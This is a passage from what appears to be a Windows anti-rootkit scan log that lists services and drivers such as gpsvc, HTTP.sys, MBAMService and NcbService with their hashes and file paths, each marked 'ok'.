20:02:50.0061 0x0b14  gagp30kx - ok
20:02:50.0155 0x0b14  [ C403C5DB49A0F9AAF4F2128EDC0106D8, 3C6948B63278022D8182F773C5FA15784514F76C1546118DDBADBA322B962D12 ] GamesAppService C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
20:02:50.0201 0x0b14  GamesAppService - ok
20:02:50.0248 0x0b14  [ 0BF5CAD281E25F1418E5B8875DC5ADD1, 0929AD8437DD78234553D8B2CDF0D6838FD54ACDE1918AFEBE48684EB32A07A3 ] gencounter      C:\WINDOWS\System32\drivers\vmgencounter.sys
20:02:50.0248 0x0b14  gencounter - ok
20:02:50.0326 0x0b14  [ 8DF1254093B5C354CE725EB6B9B0DE19, DE6C5661CC076DA44B8A5D044FDB7280EDCF38D322A98C14FDC82E25586B3014 ] GPIOClx0101     C:\WINDOWS\system32\Drivers\msgpioclx.sys
20:02:50.0342 0x0b14  GPIOClx0101 - ok
20:02:50.0483 0x0b14  [ 0D03F87D4FF4ADBAF8336DD80548155A, BC10CFA88EA2F41A8D96CB810B7953A4C168B79273A3E804A9F020F49AB58CD3 ] gpsvc           C:\WINDOWS\System32\gpsvc.dll
20:02:50.0561 0x0b14  gpsvc - ok
20:02:50.0686 0x0b14  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
20:02:50.0686 0x0b14  gupdate - ok
20:02:50.0701 0x0b14  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
20:02:50.0717 0x0b14  gupdatem - ok
20:02:50.0748 0x0b14  [ D4B7ED39C7900384D9E5C1283F1E7926, F93F98858067B40F1C071EAD0F8E85442A78B95342BC692AF4D726540634923F ] HDAudBus        C:\WINDOWS\System32\drivers\HDAudBus.sys
20:02:50.0764 0x0b14  HDAudBus - ok
20:02:50.0811 0x0b14  [ 10A70BC1871CD955D85CD88372724906, 2480A74854D0A89FF028EE9BA41224D4B2F9B0863066BFC43097920794FEE08D ] HidBatt         C:\WINDOWS\System32\drivers\HidBatt.sys
20:02:50.0811 0x0b14  HidBatt - ok
20:02:50.0889 0x0b14  [ 42F88B57CAE42FC10059C887B3FCFCEA, 9363AA2B8E839A6935A7C6A36C491938DF78024886DCCE6D29CB18E1D6A6D806 ] HidBth          C:\WINDOWS\System32\drivers\hidbth.sys
20:02:50.0905 0x0b14  HidBth - ok
20:02:50.0920 0x0b14  [ C241A8BAFBBFC90176EA0F5240EACC17, 571E20B87818618BE9179986177D55739A240F04D1F740B3C1B7809B9427B767 ] hidi2c          C:\WINDOWS\System32\drivers\hidi2c.sys
20:02:50.0936 0x0b14  hidi2c - ok
20:02:50.0998 0x0b14  [ 9BDDEE26255421017E161CCB9D5EDA95, B766FD5E31708F29384F69418FC33C4BCC6E3064AA553D5B1D30EE0B8B1BFB40 ] HidIr           C:\WINDOWS\System32\drivers\hidir.sys
20:02:51.0014 0x0b14  HidIr - ok
20:02:51.0061 0x0b14  [ EA85B5093DF7B5C3E80362B053740AE2, 1D4251385402A2ADEE8FA1642F54180304F88337DA74989BDE44025ABB145FE5 ] hidserv         C:\WINDOWS\system32\hidserv.dll
20:02:51.0061 0x0b14  hidserv - ok
20:02:51.0108 0x0b14  [ 8DB8EAB9D0C6A5DF0BDCADEA239220B4, EDA23E6909EB83E5E148816DFB16CC29EA01BD6BD2F73AA46B3D820B85FB9C83 ] HidUsb          C:\WINDOWS\System32\drivers\hidusb.sys
20:02:51.0108 0x0b14  HidUsb - ok
20:02:51.0170 0x0b14  [ 93C4315F47F8D635C6DB0DF49FCE10EE, 70C52B8927D54ACD23F27948780B522974250FD5CD81AA9801C3F158C402889F ] hkmsvc          C:\WINDOWS\system32\kmsvc.dll
20:02:51.0186 0x0b14  hkmsvc - ok
20:02:51.0233 0x0b14  [ AC49522ED106BD4B545D6614D71C2445, 40BD738A301170378ECFC031635EB04E2F812B676376CADDD6607ECABEC9255F ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
20:02:51.0248 0x0b14  HomeGroupListener - ok
20:02:51.0326 0x0b14  [ 99932E30CE0283B73BB6E5019E150394, 1F88C2F56A7B8E1F75E6359281F418F9661DA4FB7B7D7B14FA7F718B15D4DCE0 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
20:02:51.0358 0x0b14  HomeGroupProvider - ok
20:02:51.0451 0x0b14  [ 2A8B93A01621E100A578E83C768AFA2C, 6637D260AF180D1F200D219796FCE6D524FC6BF57C0CEEF9E1B3616E85865AD1 ] HP Support Assistant Service C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
20:02:51.0451 0x0b14  HP Support Assistant Service - ok
20:02:51.0578 0x0b14  [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex        C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
20:02:51.0640 0x0b14  hpqwmiex - ok
20:02:51.0687 0x0b14  [ A6AACEA4C785789BDA5912AD1FEDA80D, D197012A5DA6AB3F76FF298336DF0CF027C07ECC71267BAEF5912DE12893E096 ] HpSAMD          C:\WINDOWS\system32\drivers\HpSAMD.sys
20:02:51.0703 0x0b14  HpSAMD - ok
20:02:51.0734 0x0b14  [ F50912B0A861ED396F6062E79C37A4A7, 9B53EA5A03BB664EF5343B766C760BB8A96697ED4F2A0C81A4F58C443B4BC329 ] HPWMISVC        C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
20:02:51.0750 0x0b14  HPWMISVC - ok
20:02:51.0844 0x0b14  [ E87A6D3B8FECD5B93BC0CFBB48C27970, 55C49B6F3822450447C082B40A263F3370694DB53AD0018ADEB911E4A9F65A88 ] HTTP            C:\WINDOWS\system32\drivers\HTTP.sys
20:02:51.0906 0x0b14  HTTP - ok
20:02:51.0953 0x0b14  [ 90656C0B3864804B090434EFC582404F, BDB60050B729AACB9E009AC7129BEBD6298BBD8A9DB14B817D02E8E13669BD6E ] hwpolicy        C:\WINDOWS\system32\drivers\hwpolicy.sys
20:02:51.0969 0x0b14  hwpolicy - ok
20:02:52.0015 0x0b14  [ 6D6F9E3BF0484967E52F7E846BFF1CA1, C982966BDE6A3E6773D9441ADA7A3B08D13511DFC68D04DF303248B942423F38 ] hyperkbd        C:\WINDOWS\System32\drivers\hyperkbd.sys
20:02:52.0031 0x0b14  hyperkbd - ok
20:02:52.0047 0x0b14  [ 907C870F8C31F8DDD6F090857B46AB25, 308664A31717383D06185875E76C6612407A9F04E7DB28404F574A5706C6715D ] HyperVideo      C:\WINDOWS\system32\DRIVERS\HyperVideo.sys
20:02:52.0047 0x0b14  HyperVideo - ok
20:02:52.0109 0x0b14  [ 49EE0AE9E5B64FFBBD06D55C4984B598, 8866627F9241B24A59C81D8BCC67A4DCA87576F589599BA291D0E323F679EB4D ] i8042prt        C:\WINDOWS\System32\drivers\i8042prt.sys
20:02:52.0125 0x0b14  i8042prt - ok
20:02:52.0187 0x0b14  [ 5D90E32E36CE5D4C535D17CE08AEAF05, 976A463343E8C8308AFBE9E64DF56C430D2241DE002430D00318AB065EB72E4A ] iaLPSSi_GPIO    C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
20:02:52.0203 0x0b14  iaLPSSi_GPIO - ok
20:02:52.0234 0x0b14  [ DD05E7E80F52ADE9AEB292819920F32C, E71AB6A50B0F90C8F94569CE89F66F915A0A4A00D4AC091B2E5E750D88CFC334 ] iaLPSSi_I2C     C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
20:02:52.0250 0x0b14  iaLPSSi_I2C - ok
20:02:52.0328 0x0b14  [ 050F2539E14F9D5E90A4B61738EC29BD, 0E65468B9F452FA7DB6DF2C1B2B2E9439C79031E27054FBDBDFE28A9F98721D7 ] iaStorA         C:\WINDOWS\System32\drivers\iaStorA.sys
20:02:52.0375 0x0b14  iaStorA - ok
20:02:52.0469 0x0b14  [ 08BFE413B0B4AA8DFA4B5684CE06D3DC, 95DEEBB203E12EE6E191F5247A74C04AEC0E16DE981FADDC4D6C42EE41D8D079 ] iaStorAV        C:\WINDOWS\system32\drivers\iaStorAV.sys
20:02:52.0515 0x0b14  iaStorAV - ok
20:02:52.0578 0x0b14  [ A2200C3033FA4EF249FC096A7A7D02A2, 5819F5C2020DE2EEE339B0C08CD4B1E3490EAFBBEA1277CE649DB5A5150986B0 ] iaStorV         C:\WINDOWS\system32\drivers\iaStorV.sys
20:02:52.0609 0x0b14  iaStorV - ok
20:02:52.0625 0x0b14  IEEtwCollectorService - ok
20:02:52.0734 0x0b14  [ 3DBDBD9581C015F02651D6A89801FAD5, 81B6D302C9CD29AD8319515056CFBCD0BD25619B2B166937ACD5F1416B568837 ] IKEEXT          C:\WINDOWS\System32\ikeext.dll
20:02:52.0797 0x0b14  IKEEXT - ok
20:02:53.0125 0x0b14  [ C2F868881D48A568B525255F084EF063, EFB1704AE223CF886EDA5F1411C8178EDE4B5E1F7EE373E3DA89A6EA1A57D91D ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
20:02:53.0422 0x0b14  IntcAzAudAddService - ok
20:02:53.0500 0x0b14  [ 4E448FCFFD00E8D657CD9E48D3E47157, 4A958CF0BF8DAEAE5E008500BA67CE89B21388592811274331EE39CAC1043A00 ] intelide        C:\WINDOWS\system32\drivers\intelide.sys
20:02:53.0500 0x0b14  intelide - ok
20:02:53.0531 0x0b14  [ A770340FC02B999EF0DE6C2A6BC8437C, 214567BE706B21BEA7EC13AF6B10FBFF658000511DBBA79BAA28D1D4EFD029A7 ] intelpep        C:\WINDOWS\system32\drivers\intelpep.sys
20:02:53.0531 0x0b14  intelpep - ok
20:02:53.0570 0x0b14  [ 47E74A8E53C7C24DCE38311E1451C1D9, 79B06E37A552C8A847404D4C572CDB8CF525354D8AE3BEBC06892B7C3B330761 ] intelppm        C:\WINDOWS\System32\drivers\intelppm.sys
20:02:53.0601 0x0b14  intelppm - ok
20:02:53.0632 0x0b14  [ 9DB76D7F9E4E53EFE5DD8C53DE837514, 07BA4EDA9BE9139A689A2C3EFC1D1A4F3D1216625ED145F313398292A2CD5703 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:02:53.0648 0x0b14  IpFilterDriver - ok
20:02:53.0757 0x0b14  [ A5800036E4EA06697A34742A24ACFBE1, BA67060526E9213000B4206F86A74F904999AD7018EFCBE4FE9708650DA9D973 ] iphlpsvc        C:\WINDOWS\System32\iphlpsvc.dll
20:02:53.0804 0x0b14  iphlpsvc - ok
20:02:53.0851 0x0b14  [ 9C096BF5E10CA8BFA56F32522A89FAF1, 6C1151160799338DA351C7237AB049926C6C15F24F5E154BBF5929B4A96C0B8D ] IPMIDRV         C:\WINDOWS\System32\drivers\IPMIDrv.sys
20:02:53.0882 0x0b14  IPMIDRV - ok
20:02:53.0898 0x0b14  [ B7342B3C58E91107F6E946A93D9D4EFD, D5DA3C02C5C5A343785745EF6983CC9B5FBD3FB8D49FE9B450523E50212D1A32 ] IPNAT           C:\WINDOWS\system32\drivers\ipnat.sys
20:02:53.0929 0x0b14  IPNAT - ok
20:02:53.0976 0x0b14  [ AE44C526AB5F8A487D941CEB57B10C97, A783A2EAF7A6FF450FB3F189A5930036FA60D125C42171AC44B6FE2E3DBD6F7A ] IRENUM          C:\WINDOWS\system32\drivers\irenum.sys
20:02:53.0992 0x0b14  IRENUM - ok
20:02:54.0007 0x0b14  [ 8AFEEA3955AA43616A60F133B1D25F21, E99359A4F1D653790133F145CF7C9F97399FD75C5E135AA7E5F989BB660789AF ] isapnp          C:\WINDOWS\system32\drivers\isapnp.sys
20:02:54.0023 0x0b14  isapnp - ok
20:02:54.0101 0x0b14  [ D90AB68D0FAC9F357F663670FDBB511E, A82AAA5DF1B38EFBDCF834535A0C520D1BB2D7A4A906C18CFDD22BCF16BDB97D ] iScsiPrt        C:\WINDOWS\System32\drivers\msiscsi.sys
20:02:54.0148 0x0b14  iScsiPrt - ok
20:02:54.0164 0x0b14  [ 5917AFE4A3F695A54B99C1849C8207FE, DD57638966F2F0387DCF9DA4BBAEE3CDD8CC6F1A2D49581A0374D46A565BED4F ] kbdclass        C:\WINDOWS\System32\drivers\kbdclass.sys
20:02:54.0179 0x0b14  kbdclass - ok
20:02:54.0226 0x0b14  [ 8CD840A062F6BDF41DDE3ACB96164B72, AEAE867F3557C1CE6B931E19D7144A3BD3CBABD81B1542667680D54FC24DEBE1 ] kbdhid          C:\WINDOWS\System32\drivers\kbdhid.sys
20:02:54.0226 0x0b14  kbdhid - ok
20:02:54.0273 0x0b14  [ 813871C7D402A05F2E3A7075F9584A05, FF0C2F87EB083F8CE74C679D80C845CDFBFBBC70BE818F899F3336BBB54A3FFB ] kdnic           C:\WINDOWS\system32\DRIVERS\kdnic.sys
20:02:54.0289 0x0b14  kdnic - ok
20:02:54.0304 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] KeyIso          C:\WINDOWS\system32\lsass.exe
20:02:54.0320 0x0b14  KeyIso - ok
20:02:54.0335 0x0b14  [ 4E829B18D5BAEC29893792A3C671A847, 64C3B99F53A9D1ACA802B46B09E820AD210B667D5A1CD0ADAF1F12944B15B52E ] KSecDD          C:\WINDOWS\system32\Drivers\ksecdd.sys
20:02:54.0335 0x0b14  KSecDD - ok
20:02:54.0367 0x0b14  [ 46711F40D0F9E63F786ED23F9BD5215E, 1FBC5101D843E5B43184C98B3D9AF3015C9409EEA6C7BB01B143FD08D4946FC0 ] KSecPkg         C:\WINDOWS\system32\Drivers\ksecpkg.sys
20:02:54.0382 0x0b14  KSecPkg - ok
20:02:54.0398 0x0b14  [ 11AFB527AA370B1DAFD5C36F35F6D45F, 757AD234284467ADB826F7CA0251F58D48866B91995BC867DEA4BAF676947163 ] ksthunk         C:\WINDOWS\system32\drivers\ksthunk.sys
20:02:54.0414 0x0b14  ksthunk - ok
20:02:54.0492 0x0b14  [ C1591A66028C71147A3E2EAB0B1CCB7E, 82F3D5DCC1614398A144D9791E4BAA814DBA9112677341FD57D5E9834CEDEB41 ] KtmRm           C:\WINDOWS\system32\msdtckrm.dll
20:02:54.0523 0x0b14  KtmRm - ok
20:02:54.0601 0x0b14  [ CA2828DDE4B09FEFFDB7CE68B3D8D00A, B514792FF1EF36C678BB51644A1C420105D5E2CD6DD5A89A3FB252D08277A40C ] LanmanServer    C:\WINDOWS\system32\srvsvc.dll
20:02:54.0617 0x0b14  LanmanServer - ok
20:02:54.0679 0x0b14  [ 3DBD9100745F9B8506B8FEC6FE6CCDE3, C3EF2856A1680AFDE133887E48946CF9CAB6755C3BDC07F0326965DCD4096F62 ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
20:02:54.0710 0x0b14  LanmanWorkstation - ok
20:02:54.0789 0x0b14  [ 8B9F3796EC1762CF255BDB324E5529C8, F73D6BEF19BE20AEB18DA82CB63E9D8B50ACBBE4ED9B646EF0C9F598F6B81F94 ] lfsvc           C:\WINDOWS\System32\GeofenceMonitorService.dll
20:02:54.0835 0x0b14  lfsvc - ok
20:02:54.0867 0x0b14  [ C09010B3680860131631F53E8FE7BAD8, 35F2A06D5F29478D22ABDCC20DA893EF9D96504C65594A0CEA674D1C21B04FF8 ] lltdio          C:\WINDOWS\system32\DRIVERS\lltdio.sys
20:02:54.0882 0x0b14  lltdio - ok
20:02:54.0945 0x0b14  [ DAE98CC96C5EE308BF4EA7B18F226CB8, 7A6CC56BF075010707715AB6608764291E358EDF27C806A025532869004C686B ] lltdsvc         C:\WINDOWS\System32\lltdsvc.dll
20:02:54.0976 0x0b14  lltdsvc - ok
20:02:55.0007 0x0b14  [ 1E2662D847B7D9995C65D90D254A7E0F, AFD4063D2071FFCB6B0EAC0715276D986F42326919C86E525DCE12E1109A93E2 ] lmhosts         C:\WINDOWS\System32\lmhsvc.dll
20:02:55.0007 0x0b14  lmhosts - ok
20:02:55.0070 0x0b14  [ C755AE4635457AA2A11F79C0DF857ABC, E03D1ACAC155287291FE1BD0B653953ADC94279A74D0152088D698FAA796460F ] LSI_SAS         C:\WINDOWS\system32\drivers\lsi_sas.sys
20:02:55.0085 0x0b14  LSI_SAS - ok
20:02:55.0117 0x0b14  [ ADAC09CBE7A2040B7F68B5E5C9A75141, 7865DA7E91404F3642BC444B97F6B7AA42B9523D5EDD7F6365DA236B8EC3410F ] LSI_SAS2        C:\WINDOWS\system32\drivers\lsi_sas2.sys
20:02:55.0132 0x0b14  LSI_SAS2 - ok
20:02:55.0179 0x0b14  [ 04D1274BB9BBCCF12BD12374002AA191, 4B9618F8D25F2278DE1610A70ACAADB074D171D162C3AF27D464F5DC800A8E60 ] LSI_SAS3        C:\WINDOWS\system32\drivers\lsi_sas3.sys
20:02:55.0195 0x0b14  LSI_SAS3 - ok
20:02:55.0242 0x0b14  [ 327469EEF3833D0C584B7E88A76AEC0C, 3D88B5A2D68F93F01B39C6E3D8D5C7A2A20686EFC756086E66AFFF1BC3019B85 ] LSI_SSS         C:\WINDOWS\system32\drivers\lsi_sss.sys
20:02:55.0257 0x0b14  LSI_SSS - ok
20:02:55.0351 0x0b14  [ 9A7A7E45DAED2E8C2816716D8D28236A, C94787988826E546A8DC752BD6BE4EA7423DC3762B2D371DB297A63F865A95FF ] LSM             C:\WINDOWS\System32\lsm.dll
20:02:55.0398 0x0b14  LSM - ok
20:02:55.0445 0x0b14  [ DDEE191AB32DFC22C6465002ECDF5EE4, 190C3930A8449118F9FEDF43C482837EF1C255E6D67F9651156E66A1E2BC6553 ] luafv           C:\WINDOWS\system32\drivers\luafv.sys
20:02:55.0460 0x0b14  luafv - ok
20:02:55.0492 0x0b14  [ A8D28D5B3E2A528D1EF0E338E44F2820, 40D1EFDD253BC0A0D984A5AD8A2721C3E83B15F14D538204714E6D5B00D92CEB ] MBAMProtector   C:\WINDOWS\system32\drivers\mbam.sys
20:02:55.0492 0x0b14  MBAMProtector - ok
20:02:55.0680 0x0b14  [ 301E3FDFCF33640BB8763BA444BC5093, 362B069BB9A313A06B376CE27E6F7F8D569F6CA39A8ABC96D9DF231EE462C604 ] MBAMScheduler   C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
20:02:55.0789 0x0b14  MBAMScheduler - ok
20:02:55.0899 0x0b14  [ 83C982A395D00BAFF6515FB38424EA76, 0E1B66F84A483D47550347D4A9426B95A066DB5104C4284F606A16768A11DB0C ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
20:02:55.0961 0x0b14  MBAMService - ok
20:02:56.0024 0x0b14  [ 85CFE7AB85B43B6B7AC7961AA3983A9F, 4E88B75818FD00C0ABBDF8E02EBFB550A67B46E5E13D3B3DF52611793F7DA0DD ] MBAMWebAccessControl C:\WINDOWS\system32\drivers\mwac.sys
20:02:56.0024 0x0b14  MBAMWebAccessControl - ok
20:02:56.0070 0x0b14  [ EB5C03A070F30D64A6DF80E53B22F53F, 12051B6AEBDEE1E28F24364F25A52BA3A6E282ECF86D6290E34BD38E6D4E066D ] megasas         C:\WINDOWS\system32\drivers\megasas.sys
20:02:56.0086 0x0b14  megasas - ok
20:02:56.0149 0x0b14  [ F6F13533196DE7A582D422B0241E4363, B3CD9B08937AFFF12141B38634AF3A56F5AC5FF3EF03941802B9841DEC559469 ] megasr          C:\WINDOWS\system32\drivers\megasr.sys
20:02:56.0195 0x0b14  megasr - ok
20:02:56.0242 0x0b14  [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] MMCSS           C:\WINDOWS\system32\mmcss.dll
20:02:56.0258 0x0b14  MMCSS - ok
20:02:56.0289 0x0b14  [ 8B38C44F69259987C95135C9627E2378, E698B82D4EFFF56D66C7FC9866369BA5736FDBDBE2028CC421C51E70DEA74727 ] Modem           C:\WINDOWS\system32\drivers\modem.sys
20:02:56.0305 0x0b14  Modem - ok
20:02:56.0352 0x0b14  [ 601589000CC90F0DF8DA2CC254A3CCC9, D1238A386C41B6C368D9A44B7C112C943995B5403E2A5B4B7346B266DDB0C5A0 ] monitor         C:\WINDOWS\System32\drivers\monitor.sys
20:02:56.0352 0x0b14  monitor - ok
20:02:56.0367 0x0b14  [ 08374E4E5B8914DE6067CBA99F61E930, CBB1390D6523FC968BEDF78FD13699488621ACB2CD1DF55D1606316090548661 ] mouclass        C:\WINDOWS\System32\drivers\mouclass.sys
20:02:56.0383 0x0b14  mouclass - ok
20:02:56.0430 0x0b14  [ 5FCBAB60598AE119E02B4C27DE6B99EA, 36F30094F700DE41C293047ACB49ED1961DD927BEDAD8DFDAB7023D4D24CB0DE ] mouhid          C:\WINDOWS\System32\drivers\mouhid.sys
20:02:56.0430 0x0b14  mouhid - ok
20:02:56.0492 0x0b14  [ D1D82F007A079A4D623DBD1F36EF30A1, 7901F81B62C5A4196D75A10C05386B16831CB290EFB9A1611CECF281068C520F ] mountmgr        C:\WINDOWS\system32\drivers\mountmgr.sys
20:02:56.0492 0x0b14  mountmgr - ok
20:02:56.0508 0x0b14  [ 6FC047578785B0435F4E2660946D1ADC, 8AEA5659F01FC2F75160922C69622502DABA39F33CB90D5178DD679A1CDE617D ] mpsdrv          C:\WINDOWS\system32\drivers\mpsdrv.sys
20:02:56.0539 0x0b14  mpsdrv - ok
20:02:56.0633 0x0b14  [ C18AA14126ADC66478E8E962B2DFAA98, A6F8CE9D88D590DC083253004392572C3BD02C33433CD6C0D9117D2AA7171EEC ] MpsSvc          C:\WINDOWS\system32\mpssvc.dll
20:02:56.0695 0x0b14  MpsSvc - ok
20:02:56.0742 0x0b14  [ DB32958F0E704EFBF7F15161A569E39F, 8A26448B954F8A16EE9BA72EF47F6C549A75B30BD13FEB5A29EB099A74D8F678 ] MRxDAV          C:\WINDOWS\system32\drivers\mrxdav.sys
20:02:56.0758 0x0b14  MRxDAV - ok
20:02:56.0820 0x0b14  [ 6FBDF2B1B025A8E6E069234362FFFFB7, CF1AFC088F59AD61037F4C4650F3BAEE7FE37C40B3A27B903475F005410F8155 ] mrxsmb          C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
20:02:56.0836 0x0b14  mrxsmb - ok
20:02:56.0883 0x0b14  [ BCBD64220AD85C26823453FF1DC3EFBD, 0245E3659E9135B9276F3CCFBEA0CEFFC4F4C0826F6D19B6329057620235F087 ] mrxsmb10        C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
20:02:56.0899 0x0b14  mrxsmb10 - ok
20:02:56.0930 0x0b14  [ 57C2473D501331211D6885FD59F3E44B, 10253703DB32A32291C61B6962A79E374B5DF7DD14A6B6AFD08A99EF26206619 ] mrxsmb20        C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
20:02:56.0945 0x0b14  mrxsmb20 - ok
20:02:56.0992 0x0b14  [ F3C060444777A59FC63D920719E43CCD, 8766A2746E3DFB0749E902F458141269335CA6F0CEDCA3D5F8C204637C19E783 ] MsBridge        C:\WINDOWS\system32\DRIVERS\bridge.sys
20:02:57.0008 0x0b14  MsBridge - ok
20:02:57.0055 0x0b14  [ 915747E010A9414B069173284A9B93F4, 8A335C28FE1EF96DD71485877F2E86155D24B5614ACE05468F4B07E2ACD56331 ] MSDTC           C:\WINDOWS\System32\msdtc.exe
20:02:57.0086 0x0b14  MSDTC - ok
20:02:57.0133 0x0b14  [ D13329FBF8345B28AB30F44CC247DC08, 9C7EC2D4D65E6510EB5B9E61BB0D14F725D7E8FE98D65161C3971E43EF1AB6EB ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
20:02:57.0164 0x0b14  Msfs - ok
20:02:57.0195 0x0b14  [ C6B474E46F9E543B875981ED3FFE6ADD, E16687E52FB649C23D92159A1F036CB662202C1E58D961EECDAA528AA4FA669A ] msgpiowin32     C:\WINDOWS\System32\drivers\msgpiowin32.sys
20:02:57.0211 0x0b14  msgpiowin32 - ok
20:02:57.0242 0x0b14  [ 65C92EB9D08DB5C69F28C7FFD4E84E31, D709BA4723225321F665B1157A33A4AE230420752308EF535DA9A41CAC164628 ] mshidkmdf       C:\WINDOWS\System32\drivers\mshidkmdf.sys
20:02:57.0242 0x0b14  mshidkmdf - ok
20:02:57.0258 0x0b14  [ 52299F086AC2DAFD100DD5DC4A8614BA, B36BE0FC96798E5EB8C193C318970E3906961E3ABC3BFAAD73138C76D9A95B0B ] mshidumdf       C:\WINDOWS\System32\drivers\mshidumdf.sys
20:02:57.0274 0x0b14  mshidumdf - ok
20:02:57.0289 0x0b14  [ 36D92AF3343C3A3E57FEF11C449AEA4C, ECC85AA1E530DF55B4A4545798219F87F0FCA66DDD2E37BCEF0850D3C9129DD2 ] msisadrv        C:\WINDOWS\system32\drivers\msisadrv.sys
20:02:57.0289 0x0b14  msisadrv - ok
20:02:57.0352 0x0b14  [ 4EAEEBAC8CFF4E0D717DFA920BC58A90, A65CB1BB3392B6A04B978348CAC18A414560A6B04A727F22DFC0ADB20DD3AF6B ] MSiSCSI         C:\WINDOWS\system32\iscsiexe.dll
20:02:57.0367 0x0b14  MSiSCSI - ok
20:02:57.0383 0x0b14  msiserver - ok
20:02:57.0430 0x0b14  [ A9BBBD2BAE6142253B9195E949AC2E8D, 599D2952D4E0B0B3E02D91E38A30F4900B1ADA330716B887B156A1CB9A3E6EE9 ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:02:57.0430 0x0b14  MSKSSRV - ok
20:02:57.0477 0x0b14  [ 51B3AC0560848CD6D65AC2033E293113, 73A27E88774C6929328E6C9FC9C389F4DF76D4D4D5CBFC4F51651CC308829628 ] MsLldp          C:\WINDOWS\system32\DRIVERS\mslldp.sys
20:02:57.0492 0x0b14  MsLldp - ok
20:02:57.0524 0x0b14  [ 7B2128EB875DCBC006E6A913211006D6, 97BBD7FF770741FBFC0F181A609AD0954EA926DA203B742E8F08C89AD8FE476E ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:02:57.0539 0x0b14  MSPCLOCK - ok
20:02:57.0555 0x0b14  [ 1E88171579B218115C7A772F8DE04BD8, B9EAA835D0BF8F9C4DF8403D95EF1400E8AE38F28F9DBA87657DE2129FEF02D2 ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
20:02:57.0570 0x0b14  MSPQM - ok
20:02:57.0635 0x0b14  [ BBE2A455053E63BECBF42C2F9B21FAE0, 7C5DF563499DF59DF9895A1581E47ADF5FD54C94ECEF6C886CDB60E5E95A6DAE ] MsRPC           C:\WINDOWS\system32\drivers\MsRPC.sys
20:02:57.0650 0x0b14  MsRPC - ok
20:02:57.0682 0x0b14  [ 8D6B7D515C5CBCDB75B928A0B73C3C5E, 1EB4DC3DD21D2627C78EC3F9931D9E5D033169087E43B5D7C17BF1FF2A0028CD ] mssmbios        C:\WINDOWS\System32\drivers\mssmbios.sys
20:02:57.0682 0x0b14  mssmbios - ok
20:02:57.0713 0x0b14  [ 115019AE01E0EB9C048530D2928AB4A2, 6E2275E85EACF2D0FC784792E0D72A165589D33CBAB3BCFA8E271CA09566C925 ] MSTEE           C:\WINDOWS\system32\drivers\MSTEE.sys
20:02:57.0729 0x0b14  MSTEE - ok
20:02:57.0744 0x0b14  [ 96D604A35070360F0DD4A7A8AF410B5E, F94DD1A3566C7C8D0A76D6E1E2530552A9B7F99C5DA0DE11829325EAB9F8B7ED ] MTConfig        C:\WINDOWS\System32\drivers\MTConfig.sys
20:02:57.0760 0x0b14  MTConfig - ok
20:02:57.0775 0x0b14  [ 619CA29326B82372621DB2C0964D8365, 4091F08E266DB45A6E33A4A8B1CE9FA78BB294B3111526AA9E3868620F30AFDF ] Mup             C:\WINDOWS\system32\Drivers\mup.sys
20:02:57.0791 0x0b14  Mup - ok
20:02:57.0838 0x0b14  [ B8C35C94DCB2DFEAF03BB42131F2F77F, F0FCF367CA8F722D6ABCF7F363CD406D890D71452E91C3FC6677B47AD74D6324 ] mvumis          C:\WINDOWS\system32\drivers\mvumis.sys
20:02:57.0869 0x0b14  mvumis - ok
20:02:57.0932 0x0b14  [ 8DF30698BDD9492A9D45A4B94FB4A82A, 26B1B2D7E785E29B8BCB74C467C66AE4EBDD481ACFF36334F3BDF4506B778244 ] napagent        C:\WINDOWS\system32\qagentRT.dll
20:02:57.0963 0x0b14  napagent - ok
20:02:58.0025 0x0b14  [ 008F7CED69FD5B30CBDE1E03C6F36A27, D4ADA7834C470B17A3CD976012DC5A511B32545B9F91D23D09A85722E0B75320 ] NativeWifiP     C:\WINDOWS\system32\DRIVERS\nwifi.sys
20:02:58.0072 0x0b14  NativeWifiP - ok
20:02:58.0135 0x0b14  [ BFCE1225D10619029E68946929CEB64C, 499F560331FFBA82E3D673B47F027FDAB7BEE4F2CB5B811D69E0218839F6E6A5 ] NcaSvc          C:\WINDOWS\System32\ncasvc.dll
20:02:58.0166 0x0b14  NcaSvc - ok
20:02:58.0197 0x0b14  [ 267C97373110B7AFD3B46DF60B6CBB85, CEBB99F71D47634BB9C04DF2836DF6B47F15B3073FEFC237F85526DF01E4E38B ] NcbService      C:\WINDOWS\System32\ncbservice.dll
20:02:58.0213 0x0b14  NcbService - ok
